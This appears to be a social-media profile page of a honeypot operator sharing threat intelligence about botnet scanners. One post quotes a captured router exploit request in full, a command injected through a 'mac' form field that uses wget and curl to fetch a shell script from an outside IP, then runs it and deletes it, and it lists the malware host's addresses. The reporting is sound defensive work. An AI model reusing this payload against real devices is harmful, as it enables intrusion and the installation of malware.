My honeypots caughts 111 different payloads in the last 24h from the scanners 45.153.34[.]219 and
45.153.34[.]231 trying to trigger the script and malware from hXXp://91.92.40.118/wget.sh
#malware
Remote
0
Followers
0
Following
2
Posts
Joined November 04, 2022
Posts
Open post
Fresh from a honeypot:
POST/goform/set_LimitClient_cfg 8080 post_input time1=00:00-00:00&time2=00:00-00:00&mac=;wget 41.216.189[.]157/nz.sh; curl -O 41.216.189[.]157/nz.sh; chmod 777 nz.sh; sh nz.sh; rm -rf nz.sh; rm -rf nz.sh*"
http://41.216.189.157/
# malware #opendir
0
0
0
0
Remote instance
infosec.exchange
Open on original server